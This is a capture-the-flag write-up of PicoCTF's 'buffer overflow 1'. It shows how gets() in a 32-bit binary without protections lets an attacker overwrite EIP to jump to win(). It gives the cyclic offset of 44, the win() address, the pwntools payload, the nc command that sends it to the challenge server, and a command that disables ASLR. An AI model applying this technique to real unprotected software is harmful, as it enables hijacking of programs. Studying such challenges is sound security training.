PicoCTF - Binary Exploitation 1
How to exploit a binary by overwriting the instruction pointer
Introduction
This post will reveal the steps in completing a basic capture the flag challenged located at Pico CTF. The challenge is named 'buffer overflow 1' and is of medium difficulty.
First steps
Once the binary and source code has been downloaded, we need to first understand how the program works. We first execute the program after providing it with executable permissions:
chmod u+x vuln
Executing the program outputs this:
$ ./vuln
Please enter your string:
We provide the prompt some input:
$ ./vuln
Please enter your string:
hello friend
Okay, time to return... Fingers Crossed... Jumping to 0x804932f
This looks like a memory address. Interesting. We'll keep this in mind.
Moving on
Now we need to take a look at file's metadata. We can do this using file
and checksec
.
vuln: ELF 32-bit LSB executable, Intel i386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=685b06b911b19065f27c2d369c18ed09fbadb543, for GNU/Linux 3.2.0, not stripped
Here we can see that it is a 32-bit binary, that's dynamically linked. And most importantly for us, it is not stripped, meaning we can see the symbols (the names of functions, for example).
For checksec
, I have set the format to csv
, just so it's easier to comprehend.
Partial RELRO, No Canary found, NX disabled, No PIE
Great! It seems the binary is not sheilded by any protections. Here's what some of these protections do:
Stack Canaries: These values or 'canaries' are used to detect and prevent attacks like buffer overflows. Simply put, these values are placed between important data like return addresses. If overwritten, (if a buffer is overflowed and overwrites the canary), the programs halts execution; stopping any malicious activity from occuring.
NX: The No-Execute bit marks imperitive areas of memory (like the stack) as non-executable, this ensures that injected code or shellcode doesn't run.
PIE: Position Independent Executable ensures that the binary is loaded at random memory addresses everytime the binary is executed. Typically, however, the memory offset will remain the same, but this makes it harder to hardcode memory address in exploit scripts due to PIE.
Note PIE can be turned off on Linux systems via this command:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Don't turn this off on your main system. If you want to test it, use a virtual machine.
Back to it
So we know the binary can be easily exploited because of the lack of defensive systems. Let's take a look at the source code and see what this program does:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"
#define BUFSIZE 32
#define FLAGSIZE 64
void win() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}
We can see that there are three functions. Two things should be jumping out at you. Firstly, gets
is being used to gain input. This is great for us, but not for security. Never used gets
. It doesn't check the input length and whether it exceeds the allocated buffer. This means input larger than the buffer can overwrite other important areas of memory, included registers like the instruction pointer. So?
If we can control the instruction pointer (EIP) on 32-bit systems, we can control the program and tell it where to go and what to execute next.
Secondly, there is a win()
function, but it's never called by either main()
or vuln()
, but we still need to call it. We know now how to exploit this program.
Exploitation
To exploit this binary, we first need to know how many characters it takes until the EIP is overflown. We can do this using gdb
. I'll be using pwndbg
(linked here) which comes with some extra features like cyclic
, which is quite handy, as we'll see.
Step 1
Let's load the program in pwndbg
and see how many characters it takes to overload the EIP. We can create a pattern of characters, which will help us identify at the offset. We know the buffer length is 32, by looking at the constant in the source code. Let's create a cyclic pattern of 50:
pwndbg> cyclic 50
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama
Step 2 Let's run the program and use this as input. We should get a segmentation fault, but we should also get some very useful information.
pwndbg> r
Starting program: /home/kali/Downloads/re/bufferoverflow1/vuln
warning: Unable to find libthread_db matching inferior's thread library, thread debugging will not be available.
Please enter your string:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama
Okay, time to return... Fingers Crossed... Jumping to 0x6161616c
Program received signal SIGSEGV, Segmentation fault.
0x6161616c in ?? ()
LEGEND: STACK | HEAP |
As expected, we received a SEG fault. Let's take a look at the EIP.
EAX 0x41
EBX 0x6161616a ('jaaa')
ECX 0
EDX 0
EDI 0xf7ffcb60 (_rtld_global_ro) ββ 0
ESI 0x8049350 (__libc_csu_init) ββ endbr32
EBP 0x6161616b ('kaaa')
ESP 0xffffd240 ββ 0xf700616d /* 'ma' */
EIP 0x6161616c ('laaa')
ββββββββββββββββββββββββββ
Great! As we can see our input made its way into the EIP, overwriting with our data. We need to find how many characters it took. Luckily, pwndbg
has a handy built-in for this.
pwndbg> cyclic -l laaa
Finding cyclic pattern of 4 bytes: b'laaa' (hex: 0x6c616161)
Found at offset 44
Using cyclic -l
we can lookup the pattern. We see our offset as 44.
Step 3
Now we need to find the memory address of the win()
function. Why? So we can tell the EIP to execute this function, when we overflow it with our data. We can find the memory address like this:
pwndbg> disas win
Dump of assembler code for function win:
0x080491f6 <+0>: endbr32
0x080491fa <+4>: push ebp
0x080491fb <+5>: mov ebp,esp
0x080491fd <+7>: push ebx
0x080491fe <+8>: sub esp,0x54
0x08049201 <+11>: call 0x8049130 <__x86.get_pc_thunk.bx>
Using disas win
, we can disassemble the function into its assembly equivalent. We see now why having the symbols and the memory addresses makes our lives so much easier. I haven't shown the entirety of the win()
function, as we only need the first line, particularly, the memory address: 0x080491f6
Step 4
We now have the offset and the memory address. We just need to put it all together. However, we first need to ensure the program can read the memory address properly. To do so, we must convert it to the little endian format, which is used for 32-bit programs. Thankfully, pwntools
has a handy function for this, in python
:
import pwn
import pwnlib
>>> print(pwn.p32(0x080491f6))
b'\xf6\x91\x04\x08'
Here, we have our bytes! b'\xf6\x91\x04\x08'
Step 5 Now all we need to do, is send this data as input to the PicoCTF server. However, we first need to ensure that we create a byte string with the offset so it works correctly.
>>> offset=44
>>> print(b"A" * offset + b'\xf6\x91\x04\x08')
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf6\x91\x04\x08'
We don't actually need the b
at the start (which means bytes in python
). Using the server and port provided by PicoCTF, we can simply send the response via nc
:
β echo 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xf6\x91\x04\x08\' | nc saturn.picoctf.net 55210
Please enter your string:
Okay, time to return... Fingers Crossed... Jumping to 0x80491f6
picoCTF{addr3ss3s_REDACTED}
And you should get your flag!
Conclusion
This challenge was fairly simple, but it teaches you about what certain permissions and binaries do, and how controlling the instruction pointer means we have entire control over the program.
Last updated